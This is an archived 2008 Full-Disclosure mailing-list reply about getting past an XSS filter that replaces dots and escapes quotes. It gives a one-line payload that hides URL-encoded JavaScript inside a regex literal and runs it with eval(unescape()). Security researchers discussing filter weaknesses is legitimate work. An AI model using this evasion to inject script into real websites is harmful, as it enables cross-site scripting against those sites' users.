lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <64A4688E-5BED-47EA-AFCC-DAC3A7F2581A@gmail.com> Date: Wed, 18 Jun 2008 19:07:02 -0700 From: Andrew Farmer <andfarm@...il.com> To: Thomas Pollet <thomas.pollet@...il.com> Cc: full-disclosure@...ts.grok.org.uk Subject: Re: xss dot(.) filter evasion On 18 Jun 08, at 08:49, Thomas Pollet wrote: > I came across this site that implemented some filtering so the dots > were > replaced by an underscore, also the quotes and backslash were escaped. > I came up with the code below to bypass this filtering (write > anything to > the page using String.fromCharCode) > Someone knows a different way to do this? eval makes everything easy. Well, reasonably easy. eval(unescape(String(/%2a%2a%2falert(%22xss%22);%2f%2a%2a/))); _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists